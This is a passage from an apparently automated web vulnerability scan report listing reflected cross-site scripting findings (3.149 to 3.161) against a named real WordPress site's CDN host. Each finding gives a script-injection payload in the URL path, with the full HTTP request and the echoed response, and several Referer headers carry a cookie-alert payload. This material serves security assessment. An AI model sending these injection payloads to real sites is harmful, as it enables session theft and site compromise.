Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://www.digitalbond.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Last-Modified: Tue, 19 Apr 2011 20:08:56 GMT
Vary: User-Agent,Accept-Encoding
Content-Length: 43031

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head>
<
...[SNIP]...
<form method="post" action="http://www.digitalbond.com/wp-content/plugins/amr-ical-events-list/css/icallist.cssc461c\"><script>alert(1)</script>81ebd71ba86?ver=1&amp;_login=a230e581ae">
...[SNIP]...

3.149. http://digibond.wpengine.netdna-cdn.com/wp-content/plugins/amr-ical-events-list/css/icalprint.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://digibond.wpengine.netdna-cdn.com
Path:   /wp-content/plugins/amr-ical-events-list/css/icalprint.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6d47c"><script>alert(1)</script>cccc92e06a7 was submitted in the REST URL parameter 1. This input was echoed as 6d47c\"><script>alert(1)</script>cccc92e06a7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content6d47c"><script>alert(1)</script>cccc92e06a7/plugins/amr-ical-events-list/css/icalprint.css?ver=1 HTTP/1.1
Host: digibond.wpengine.netdna-cdn.com
Proxy-Connection: keep-alive
Referer: http://www.digitalbond.com/2008/07/20/managing-your-security-career5f595%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E67a759c718b/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.36
Date: Tue, 19 Apr 2011 20:08:05 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Pragma: no-cache
X-Pingback: http://www.digitalbond.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Last-Modified: Tue, 19 Apr 2011 20:08:01 GMT
Cache-Control: max-age=86400
X-Varnish: 1668602653
Age: 0
Via: 1.1 varnish
X-Cache: MISS
Content-Length: 43035

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head>
<
...[SNIP]...
<form method="post" action="http://www.digitalbond.com/wp-content6d47c\"><script>alert(1)</script>cccc92e06a7/plugins/amr-ical-events-list/css/icalprint.css?ver=1&amp;_login=a8aa1f4a55">
...[SNIP]...

3.150. http://digibond.wpengine.netdna-cdn.com/wp-content/plugins/amr-ical-events-list/css/icalprint.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://digibond.wpengine.netdna-cdn.com
Path:   /wp-content/plugins/amr-ical-events-list/css/icalprint.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1507c"><script>alert(1)</script>38cdb41f31a was submitted in the REST URL parameter 2. This input was echoed as 1507c\"><script>alert(1)</script>38cdb41f31a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins1507c"><script>alert(1)</script>38cdb41f31a/amr-ical-events-list/css/icalprint.css?ver=1 HTTP/1.1
Host: digibond.wpengine.netdna-cdn.com
Proxy-Connection: keep-alive
Referer: http://www.digitalbond.com/2008/07/20/managing-your-security-career5f595%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E67a759c718b/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.36
Date: Tue, 19 Apr 2011 20:08:34 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Pragma: no-cache
X-Pingback: http://www.digitalbond.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Last-Modified: Tue, 19 Apr 2011 20:08:31 GMT
Cache-Control: max-age=86400
X-Varnish: 1668605002
Age: 0
Via: 1.1 varnish
X-Cache: MISS
Content-Length: 43035

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head>
<
...[SNIP]...
<form method="post" action="http://www.digitalbond.com/wp-content/plugins1507c\"><script>alert(1)</script>38cdb41f31a/amr-ical-events-list/css/icalprint.css?ver=1&amp;_login=23ae79ccbf">
...[SNIP]...

3.151. http://digibond.wpengine.netdna-cdn.com/wp-content/plugins/amr-ical-events-list/css/icalprint.css [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://digibond.wpengine.netdna-cdn.com
Path:   /wp-content/plugins/amr-ical-events-list/css/icalprint.css

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 64300"><script>alert(1)</script>a237d15471e was submitted in the REST URL parameter 5. This input was echoed as 64300\"><script>alert(1)</script>a237d15471e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/amr-ical-events-list/css/icalprint.css64300"><script>alert(1)</script>a237d15471e?ver=1 HTTP/1.1
Host: digibond.wpengine.netdna-cdn.com
Proxy-Connection: keep-alive
Referer: http://www.digitalbond.com/2008/07/20/managing-your-security-career5f595%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E67a759c718b/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.36
Date: Tue, 19 Apr 2011 20:09:04 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://www.digitalbond.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Last-Modified: Tue, 19 Apr 2011 20:09:01 GMT
Vary: User-Agent,Accept-Encoding
Content-Length: 42977

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head>
<
...[SNIP]...
<form method="post" action="http://www.digitalbond.com/wp-content/plugins/amr-ical-events-list/css/icalprint.css64300\"><script>alert(1)</script>a237d15471e?ver=1&amp;_login=ebdae81ce4">
...[SNIP]...

3.152. http://digibond.wpengine.netdna-cdn.com/wp-content/plugins/grunion-contact-form/css/grunion.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://digibond.wpengine.netdna-cdn.com
Path:   /wp-content/plugins/grunion-contact-form/css/grunion.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2db02"><script>alert(1)</script>561302ac03e was submitted in the REST URL parameter 1. This input was echoed as 2db02\"><script>alert(1)</script>561302ac03e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content2db02"><script>alert(1)</script>561302ac03e/plugins/grunion-contact-form/css/grunion.css?ver=3.1.1 HTTP/1.1
Host: digibond.wpengine.netdna-cdn.com
Proxy-Connection: keep-alive
Referer: http://www.digitalbond.com/2008/07/20/managing-your-security-career5f595%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E67a759c718b/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.36
Date: Tue, 19 Apr 2011 20:07:59 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Pragma: no-cache
X-Pingback: http://www.digitalbond.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Last-Modified: Tue, 19 Apr 2011 20:07:55 GMT
Cache-Control: max-age=86400
X-Varnish: 1668602153
Age: 0
Via: 1.1 varnish
X-Cache: MISS
Content-Length: 43041

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head>
<
...[SNIP]...
<form method="post" action="http://www.digitalbond.com/wp-content2db02\"><script>alert(1)</script>561302ac03e/plugins/grunion-contact-form/css/grunion.css?ver=3.1.1&amp;_login=26b7466406">
...[SNIP]...

3.153. http://digibond.wpengine.netdna-cdn.com/wp-content/plugins/grunion-contact-form/css/grunion.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://digibond.wpengine.netdna-cdn.com
Path:   /wp-content/plugins/grunion-contact-form/css/grunion.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 43df5"><script>alert(1)</script>8ce814d076d was submitted in the REST URL parameter 2. This input was echoed as 43df5\"><script>alert(1)</script>8ce814d076d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins43df5"><script>alert(1)</script>8ce814d076d/grunion-contact-form/css/grunion.css?ver=3.1.1 HTTP/1.1
Host: digibond.wpengine.netdna-cdn.com
Proxy-Connection: keep-alive
Referer: http://www.digitalbond.com/2008/07/20/managing-your-security-career5f595%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E67a759c718b/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.36
Date: Tue, 19 Apr 2011 20:08:29 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Pragma: no-cache
X-Pingback: http://www.digitalbond.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Last-Modified: Tue, 19 Apr 2011 20:08:25 GMT
Cache-Control: max-age=86400
X-Varnish: 1668604651
Age: 0
Via: 1.1 varnish
X-Cache: MISS
Content-Length: 43033

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head>
<
...[SNIP]...
<form method="post" action="http://www.digitalbond.com/wp-content/plugins43df5\"><script>alert(1)</script>8ce814d076d/grunion-contact-form/css/grunion.css?ver=3.1.1&amp;_login=f8359160b1">
...[SNIP]...

3.154. http://digibond.wpengine.netdna-cdn.com/wp-content/plugins/grunion-contact-form/css/grunion.css [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://digibond.wpengine.netdna-cdn.com
Path:   /wp-content/plugins/grunion-contact-form/css/grunion.css

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bd478"><script>alert(1)</script>dd6edca9943 was submitted in the REST URL parameter 5. This input was echoed as bd478\"><script>alert(1)</script>dd6edca9943 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/grunion-contact-form/css/grunion.cssbd478"><script>alert(1)</script>dd6edca9943?ver=3.1.1 HTTP/1.1
Host: digibond.wpengine.netdna-cdn.com
Proxy-Connection: keep-alive
Referer: http://www.digitalbond.com/2008/07/20/managing-your-security-career5f595%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E67a759c718b/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.36
Date: Tue, 19 Apr 2011 20:08:59 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://www.digitalbond.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Last-Modified: Tue, 19 Apr 2011 20:08:56 GMT
Vary: User-Agent,Accept-Encoding
Content-Length: 42982

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head>
<
...[SNIP]...
<form method="post" action="http://www.digitalbond.com/wp-content/plugins/grunion-contact-form/css/grunion.cssbd478\"><script>alert(1)</script>dd6edca9943?ver=3.1.1&amp;_login=3627315853">
...[SNIP]...

3.155. http://digibond.wpengine.netdna-cdn.com/wp-content/plugins/sidebar-login/style.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://digibond.wpengine.netdna-cdn.com
Path:   /wp-content/plugins/sidebar-login/style.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9cc84"><script>alert(1)</script>24036739709 was submitted in the REST URL parameter 1. This input was echoed as 9cc84\"><script>alert(1)</script>24036739709 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content9cc84"><script>alert(1)</script>24036739709/plugins/sidebar-login/style.css?ver=3.1.1 HTTP/1.1
Host: digibond.wpengine.netdna-cdn.com
Proxy-Connection: keep-alive
Referer: http://www.digitalbond.com/2008/07/20/managing-your-security-career5f595%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E67a759c718b/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.36
Date: Tue, 19 Apr 2011 20:07:59 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Pragma: no-cache
X-Pingback: http://www.digitalbond.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Last-Modified: Tue, 19 Apr 2011 20:07:55 GMT
Cache-Control: max-age=86400
X-Varnish: 1668602176
Age: 0
Via: 1.1 varnish
X-Cache: MISS
Content-Length: 42994

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head>
<
...[SNIP]...
<form method="post" action="http://www.digitalbond.com/wp-content9cc84\"><script>alert(1)</script>24036739709/plugins/sidebar-login/style.css?ver=3.1.1&amp;_login=65bccf194b">
...[SNIP]...

3.156. http://digibond.wpengine.netdna-cdn.com/wp-content/plugins/sidebar-login/style.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://digibond.wpengine.netdna-cdn.com
Path:   /wp-content/plugins/sidebar-login/style.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 21ed3"><script>alert(1)</script>ff23996d7ad was submitted in the REST URL parameter 2. This input was echoed as 21ed3\"><script>alert(1)</script>ff23996d7ad in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins21ed3"><script>alert(1)</script>ff23996d7ad/sidebar-login/style.css?ver=3.1.1 HTTP/1.1
Host: digibond.wpengine.netdna-cdn.com
Proxy-Connection: keep-alive
Referer: http://www.digitalbond.com/2008/07/20/managing-your-security-career5f595%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E67a759c718b/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.36
Date: Tue, 19 Apr 2011 20:08:29 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Pragma: no-cache
X-Pingback: http://www.digitalbond.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Last-Modified: Tue, 19 Apr 2011 20:08:25 GMT
Cache-Control: max-age=86400
X-Varnish: 1668604652
Age: 0
Via: 1.1 varnish
X-Cache: MISS
Content-Length: 42944

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head>
<
...[SNIP]...
<form method="post" action="http://www.digitalbond.com/wp-content/plugins21ed3\"><script>alert(1)</script>ff23996d7ad/sidebar-login/style.css?ver=3.1.1&amp;_login=283d6799c0">
...[SNIP]...

3.157. http://digibond.wpengine.netdna-cdn.com/wp-content/plugins/sidebar-login/style.css [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://digibond.wpengine.netdna-cdn.com
Path:   /wp-content/plugins/sidebar-login/style.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 41abd"><script>alert(1)</script>143b5139f95 was submitted in the REST URL parameter 4. This input was echoed as 41abd\"><script>alert(1)</script>143b5139f95 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/sidebar-login/style.css41abd"><script>alert(1)</script>143b5139f95?ver=3.1.1 HTTP/1.1
Host: digibond.wpengine.netdna-cdn.com
Proxy-Connection: keep-alive
Referer: http://www.digitalbond.com/2008/07/20/managing-your-security-career5f595%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E67a759c718b/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.36
Date: Tue, 19 Apr 2011 20:08:59 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://www.digitalbond.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Last-Modified: Tue, 19 Apr 2011 20:08:56 GMT
Vary: User-Agent,Accept-Encoding
Content-Length: 42971

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head>
<
...[SNIP]...
<form method="post" action="http://www.digitalbond.com/wp-content/plugins/sidebar-login/style.css41abd\"><script>alert(1)</script>143b5139f95?ver=3.1.1&amp;_login=242aca52e2">
...[SNIP]...

3.158. http://digibond.wpengine.netdna-cdn.com/wp-content/themes/atahualpa/images/favicon/fff-link.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://digibond.wpengine.netdna-cdn.com
Path:   /wp-content/themes/atahualpa/images/favicon/fff-link.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 23c07"><script>alert(1)</script>ac1ebf8b1b6 was submitted in the REST URL parameter 1. This input was echoed as 23c07\"><script>alert(1)</script>ac1ebf8b1b6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content23c07"><script>alert(1)</script>ac1ebf8b1b6/themes/atahualpa/images/favicon/fff-link.ico HTTP/1.1
Host: digibond.wpengine.netdna-cdn.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.36
Date: Tue, 19 Apr 2011 20:08:34 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Pragma: no-cache
X-Pingback: http://www.digitalbond.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Last-Modified: Tue, 19 Apr 2011 20:08:31 GMT
Cache-Control: max-age=86400
X-Varnish: 1668605031
Age: 0
Via: 1.1 varnish
X-Cache: MISS
Content-Length: 42975

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head>
<
...[SNIP]...
<form method="post" action="http://www.digitalbond.com/wp-content23c07\"><script>alert(1)</script>ac1ebf8b1b6/themes/atahualpa/images/favicon/fff-link.ico/?_login=4665c5857f">
...[SNIP]...

3.159. http://digibond.wpengine.netdna-cdn.com/wp-content/themes/atahualpa/images/favicon/fff-link.ico [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://digibond.wpengine.netdna-cdn.com
Path:   /wp-content/themes/atahualpa/images/favicon/fff-link.ico

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f3b95"><script>alert(1)</script>57b77ffa238 was submitted in the REST URL parameter 2. This input was echoed as f3b95\"><script>alert(1)</script>57b77ffa238 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themesf3b95"><script>alert(1)</script>57b77ffa238/atahualpa/images/favicon/fff-link.ico HTTP/1.1
Host: digibond.wpengine.netdna-cdn.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.36
Date: Tue, 19 Apr 2011 20:09:05 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Pragma: no-cache
X-Pingback: http://www.digitalbond.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Last-Modified: Tue, 19 Apr 2011 20:09:01 GMT
Cache-Control: max-age=86400
X-Varnish: 1668607349
Age: 0
Via: 1.1 varnish
X-Cache: MISS
Content-Length: 43005

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head>
<
...[SNIP]...
<form method="post" action="http://www.digitalbond.com/wp-content/themesf3b95\"><script>alert(1)</script>57b77ffa238/atahualpa/images/favicon/fff-link.ico/?_login=cdabbcebf9">
...[SNIP]...

3.160. http://digibond.wpengine.netdna-cdn.com/wp-content/themes/atahualpa/images/favicon/fff-link.ico [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://digibond.wpengine.netdna-cdn.com
Path:   /wp-content/themes/atahualpa/images/favicon/fff-link.ico

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cd8f9"><script>alert(1)</script>bd1c2d36605 was submitted in the REST URL parameter 6. This input was echoed as cd8f9\"><script>alert(1)</script>bd1c2d36605 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes/atahualpa/images/favicon/fff-link.icocd8f9"><script>alert(1)</script>bd1c2d36605 HTTP/1.1
Host: digibond.wpengine.netdna-cdn.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.36
Date: Tue, 19 Apr 2011 20:09:25 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://www.digitalbond.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Last-Modified: Tue, 19 Apr 2011 20:09:24 GMT
Vary: User-Agent,Accept-Encoding
Content-Length: 43000

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head>
<
...[SNIP]...
<form method="post" action="http://digibond.wpengine.netdna-cdn.com/wp-content/themes/atahualpa/images/favicon/fff-link.icocd8f9\"><script>alert(1)</script>bd1c2d36605/?_login=a5483e57b0">
...[SNIP]...

3.161. http://digibond.wpengine.netdna-cdn.com/wp-content/themes/atahualpa/js/DD_roundies.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://digibond.wpengine.netdna-cdn.com
Path:   /wp-content/themes/atahualpa/js/DD_roundies.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 646e0"><script>alert(1)</script>27728feb339 was submitted in the REST URL parameter 1. This input was echoed as 646e0\"><script>alert(1)</script>27728feb339 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content646e0"><script>alert(1)</script>27728feb339/themes/atahualpa/js/DD_roundies.js?ver=0.0.2a HTTP/1.1
Host: digibond.wpengine.netdna-cdn.com
Proxy-Connection: keep-alive
Referer: http://www.digitalbond.com/2008/07/20/managing-your-security-career5f595%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E67a759c718b/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.36
Date: Tue, 19 Apr 2011 20:08:05 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Pragma: no-cache
X-Pingback: http://www.digitalbond.com/xmlrpc.php
